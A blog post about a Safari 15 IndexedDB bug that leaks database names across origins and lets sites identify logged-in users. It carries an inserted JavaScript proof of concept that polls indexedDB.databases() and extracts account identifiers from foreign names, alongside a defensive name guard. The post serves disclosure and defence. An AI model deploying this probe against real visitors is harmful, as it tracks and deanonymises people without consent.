Exploiting IndexedDB API information leaks in Safari 15

Written by / Original link on Jan. 16, 2022


There’s a pretty nasty bug in Safari 15: when a site in one tab interacts with an IndexedDB database, that database’s name leaks to every other open tab, regardless of origin.

In Safari 15 on macOS, and in all browsers on iOS and iPadOS 15, the IndexedDB API is violating the same-origin policy. Every time a website interacts with a database, a new (empty) database with the same name is created in all other active frames, tabs, and windows within the same browser session. Windows and tabs usually share the same session, unless you switch to a different profile or open a private window.

As some sites — such as Google’s properties — include a unique identifier in the database name, that information can be used to identify a user.
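To make the two halves of this concrete, here is an added example (my own illustration, not code from the original post, from FingerprintJS, or from WebKit): a probe that enumerates the database names visible to its own origin via indexedDB.databases() and pulls account-like identifiers out of them, and a site-side guard that refuses to create a database whose name would carry such an identifier in the first place. The OWN_DATABASES list, the "ten or more digits" heuristic, and the fake database name and user ID used by the Node demo are all constructed for the example and not taken from any real site. indexedDB.databases() itself is a real API (Safari 14+, Chrome 71+; Firefox did not ship it at the time of writing).

```javascript
// Added example, not code from the original post or from FingerprintJS's demo.
// Two sides of the same bug:
//   1. a probe page that enumerates the database names leaked into its own
//      origin via indexedDB.databases() and extracts account-like identifiers;
//   2. a site-side guard that refuses to create a database whose name would
//      carry such an identifier in the first place.
// The pure helpers take plain arrays so they run under Node as well; only
// probeInBrowser() touches the real IndexedDB API.

// Databases this origin legitimately creates (constructed sample; an assumption).
const OWN_DATABASES = new Set(["my-app-cache"]);

// Heuristic for "this name embeds an account identifier": a run of ten or
// more digits. The threshold is an assumption, not something Safari defines.
const ID_RUN = /\d{10,}/;

// Names present in this origin's list that this origin never created.
// Under the Safari 15 bug these are the (empty) copies of databases that
// other origins are using in other tabs.
function findForeignDatabaseNames(names, own = OWN_DATABASES) {
  return names.filter((name) => !own.has(name));
}

// Pull candidate identifiers out of a list of names, de-duplicated.
function extractIdentifiers(names) {
  const ids = new Set();
  for (const name of names) {
    for (const run of name.match(/\d{10,}/g) || []) ids.add(run);
  }
  return [...ids];
}

// Site-side check: call before indexedDB.open(name). A name that passes
// cannot reveal an account identifier even on a browser with this bug.
function isSafeDatabaseName(name) {
  return !ID_RUN.test(name);
}

// Poll indexedDB.databases() a few times, because the leaked copy only
// appears once the other tab actually interacts with its database. `idb` is
// any object with a databases() method returning Promise<{name, version}[]>,
// so a fake can be injected outside a browser.
async function pollForLeaks(idb, { rounds = 10, intervalMs = 500, own = OWN_DATABASES } = {}) {
  const foreign = new Set();
  for (let i = 0; i < rounds; i++) {
    const names = (await idb.databases()).map((db) => db.name);
    for (const name of findForeignDatabaseNames(names, own)) foreign.add(name);
    if (i + 1 < rounds) await new Promise((resolve) => setTimeout(resolve, intervalMs));
  }
  const list = [...foreign];
  return { foreign: list, identifiers: extractIdentifiers(list) };
}

// Constructed fake that mimics what the probe would see: on the third poll
// another tab starts using a database whose name embeds a numeric user ID.
// The name format and the ID are invented for this example.
function makeFakeIndexedDB() {
  let polls = 0;
  return {
    async databases() {
      polls += 1;
      const visible = [{ name: "my-app-cache", version: 1 }];
      if (polls >= 3) visible.push({ name: "LogsDatabaseV2:1234567890123||", version: 1 });
      return visible;
    },
  };
}

// Browser entry point: run the real probe against window.indexedDB.
async function probeInBrowser() {
  if (typeof indexedDB === "undefined" || typeof indexedDB.databases !== "function") {
    throw new Error("indexedDB.databases() is not available here");
  }
  return pollForLeaks(indexedDB);
}

if (typeof indexedDB === "undefined") {
  // Under Node there is no IndexedDB; demonstrate with the fake instead.
  pollForLeaks(makeFakeIndexedDB(), { rounds: 4, intervalMs: 0 }).then((result) =>
    console.log(JSON.stringify(result)),
  );
}
```

Run in a page's console on an affected browser and call probeInBrowser() while a logged-in Google tab is open to see foreign names turn up; under Node the fake reports one foreign database and the identifier 1234567890123 extracted from it. The guard is the part worth keeping on the site side: a name that only ever contains a fixed string cannot leak anything that identifies a user, whatever the browser does.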

I feel sorry for the WebKit/Safari Engineers that this got published just before the weekend, but on the other hand the security bug was reported in November already and has been left unhandled. (Because it was filed as a security bug, it’s not publicly accessible).

Do note that, because all browsers on iOS are forced to use the same WebKit engine as Mobile Safari, every browser on that platform is affected.

Exploiting IndexedDB API information leaks in Safari 15 →
Safari 15 IndexedDB Leaks →
Safari 15 IndexedDB Leaks Code →


« "It's your fault" - Parcel CSS: A new CSS parser, compiler, and minifier written in Rust (+ example project) »